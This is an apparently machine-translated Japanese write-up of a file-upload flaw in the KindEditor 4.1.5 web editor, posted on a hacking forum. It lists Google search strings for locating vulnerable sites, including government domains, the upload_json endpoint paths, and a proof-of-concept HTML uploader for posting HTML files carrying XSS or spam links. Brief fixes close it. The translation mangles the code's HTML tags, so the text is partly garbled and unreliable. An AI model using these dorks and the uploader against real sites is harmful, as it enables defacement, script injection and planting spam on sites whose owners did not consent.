タイトル：Kindeditor=4.1.5脆弱性の再帰をアップロードします

https://hacker.bz/t/entry/5119-%E3%82%BF%E3%82%A4%E3%83%88%E3%83%AB%EF%BC%9Akindeditor415%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%AE%E5%86%8D%E5%B8%B0%E3%82%92%E3%82%A2%E3%83%83%E3%83%97%E3%83%AD%E3%83%BC%E3%83%89%E3%81%97%E3%81%BE%E3%81%99/

Followers

0x00脆弱性の説明

Kindeditorエディターには脆弱性が存在します。txtおよび.htmlファイルをアップロードしたり、PHP/ASP/JSP/ASP.NETをサポートしたりすることができます。

ここでは、HTMLはダークリンクアドレスをネストし、XSSをネストできます。 Kindeditorのuploadbutton.htmlは、ファイルアップロード機能ページに使用され、 /upload_json.*？dir=fileに直接投稿し、htm、txtが含まれています。

0x01バッチ検索

Googleでのバッチ検索：

inurl:/examples/uploadbutton.html

inurl:/php/upload_json.php

inurl:/asp.net/upload_json.ashx

inurl: //jsp/upload_json.jsp

inurl: //asp/upload_json.asp

inurl:gov.cn/kindetor/

0x02脆弱性の問題

基本的なスクリプト言語は、さまざまなアップロードアドレスをカスタマイズします。アップロードする前に、ファイルupload_json。*の存在を確認する必要があります。

/asp/upload_json.asp

/asp.net/upload_json.ashx

/jsp/upload_json.jsp

/php/upload_json.php

スクリプトがあるかどうかを確認できます。ディレクトリ変数の脆弱性をアップロード:

Kindeditor/asp/upload_json.asp？dir=file

Kindeditor/asp.net/upload_json.ashx？dir=file

Kindeditor/jsp/upload_json.jsp？dir=file

Kindeditor/Php/upload_json.php？dir=file

0x03脆弱性

Googleは、いくつかの既存のサイトを検索しますinurl：Kindeditor

1.バージョン情報を表示します

http://www.xxx.org/kindetor//kindetor.js

2。次のパスが存在する場合は、バージョン4.1.10を試すことができます。 upload_json。*

Kindeditor/asp/upload_json.asp？dir=file

Kindeditor/asp.net/upload_json.ashx？dir=file

Kindeditor/jsp/upload_json.jsp？dir=file

Kindeditor/Php/upload_json.php？dir=file

3。下の図に示すように、JSPアップロードポイント:があることを確認することができます

http://www.xxx.org/kindetor/jsp/upload_json.jsp?dir=file

4. POCをアップロードするために、次の構造を書き留めます。ここでは、スクリプト.スクリプトとURL :の内容を変更し、実際の状況に従って変更する必要があります。

htmlhead

タイトルuploader/タイトル

スクリプトsrc='http://www.xxx.org/dinkeditor //kindeditor.js'/script

スクリプト

Kindeditor.Ready（function（k）{

var uploadbutton=k.uploadbutton（{

ボタン: K（ '＃uploadbutton'）[0]、

フィールド名: 'imgfile'、

URL : 'http://www.xxx.org/kindetitor/jsp/upload_json.jsp?dir=file'、

Afterupload :関数（データ）{

if（data.error===0）{

var url=k.formaturl（data.url、 'absolute'）;

k（ '＃url'）。val（url）;}

}、

}）;

uploadbutton.filebox.change（function（e）{

uploadbutton.submit（）;

}）;

/スクリプト/ヘッドボディ

div class='upload'

input class='ke-input-text' type='text' id='url' value='' readonly='readonly' /

入力型='ボタン' id='uploadbutton' value='upload' /

/div

/体

/HTML

5.ブラウザで開いてから、インターセプトと送信のためにブプストを有効にします。 TXTファイルが正常にアップロードされていることがわかります

6.htmlファイルをアップロードすることもできます。これは、攻撃者が最もアップロードしたいファイルです（ほうれん草やその他のポルノサイトリンクアドレスなど、さまざまなダークページ接続アドレスを含む）

0x04脆弱性修正

1。delete upload_json。*およびfile_manager_json。*直接

2.キンディディターを最新バージョンにアップグレードします

Sign In

タイトル：Kindeditor=4.1.5脆弱性の再帰をアップロードします

0x00脆弱性の説明

0x01バッチ検索

0x02脆弱性の問題

0x03脆弱性

0x04脆弱性修正

0 Comments

Recommended Comments

Account

Navigation

Search